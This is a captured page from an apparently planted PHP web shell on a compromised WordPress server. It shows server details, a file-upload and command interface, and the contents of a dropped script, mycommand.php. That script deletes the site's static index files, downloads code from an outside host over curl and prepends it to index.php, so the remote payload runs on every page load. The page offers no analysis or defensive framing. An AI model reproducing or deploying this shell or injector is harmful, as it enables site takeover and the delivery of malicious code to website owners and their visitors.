Uname:Linux h2web300 4.9.0-0.bpo.12-amd64 #1 SMP Debian 4.9.210-1+deb9u1~deb8u1 (2020-06-09) x86_64

403WebShell
403Webshell
Server IP : 84.16.76.247  /  Your IP : 216.73.216.91
Web Server : Apache
System : Linux h2web300 4.9.0-0.bpo.12-amd64 #1 SMP Debian 4.9.210-1+deb9u1~deb8u1 (2020-06-09) x86_64
User : uid195448 ( 195448)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,popen,shell_exec,proc_open,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/clients/9feeab47ed6ca1a1b2890343d7a99fd4/web/wp-content/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/clients/9feeab47ed6ca1a1b2890343d7a99fd4/web/wp-content/mycommand.php
<?php
echo "RESPONSESTART";
$root = rtrim($_SERVER["DOCUMENT_ROOT"],'/');
$index = $root.'/index.php';
$source = file_get_contents($index);
$index_html = $root.'/index.html';
$index_htm = $root.'/index.htm';
if(file_exists($index_html))
{
	unlink($index_html);
}
if(file_exists($index_htm))
{
	unlink($index_htm);
}
if(!preg_match('#<!--SYSADMIN-->#',$source))
{
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, "http://jakkelly.com/code.txt");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$code = curl_exec($ch);
	curl_close($ch); 
	$new_code = $code.$source;
	$f = fopen($index, "w");
	if(fwrite($f, $new_code))
	{
		echo 'SUCCESS_CODE_RUN';
	}else{
		if(unlink($index))
		{
			touch($index);

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, "http://jakkelly.com/code.txt");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$code = curl_exec($ch);
	curl_close($ch); 
	$new_code = $code.$source;
	$f = fopen($index, "w");
			if(fwrite($f, $new_code))
			{
				echo 'SUCCESS_CODE_RUN';
			}
		}
	}
}else
{
	echo 'SUCCESS_CODE_RUN';
}
echo "RESPONSEEND";
?>

Youez - 2016 - github.com/yon3zu
LinuXploit